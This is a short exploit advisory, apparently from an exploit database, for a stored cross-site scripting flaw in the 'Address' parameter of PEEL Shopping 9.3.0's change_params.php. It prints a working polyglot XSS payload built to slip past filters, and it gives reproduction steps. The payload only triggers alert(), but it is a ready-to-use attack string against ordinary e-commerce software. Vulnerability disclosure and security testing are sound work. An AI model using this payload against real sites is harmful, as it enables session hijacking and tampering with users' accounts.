Exploit for PEEL Shopping 9.3.0 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:161367
# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting  
# Date: 2021-02-11  
# Exploit Author: Anmol K Sachan  
# Vendor Homepage: https://www.peel.fr/  
# Software Link: https://sourceforge.net/projects/peel-shopping/  
# Software: : PEEL SHOPPING 9.3.0  
# Vulnerability Type: Stored Cross-site Scripting  
# Vulnerability: Stored XSS  
# Tested on Windows 10 XAMPP  
# This application is vulnerable to Stored XSS vulnerability.  
# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php  
# Vulnerable parameters: 'Address'  
# Payload used:   
  
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()  
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e  
  
# POC: in the same page where we injected payload click on the text box to edit the address.  
# You will see your Javascript code (XSS) executed.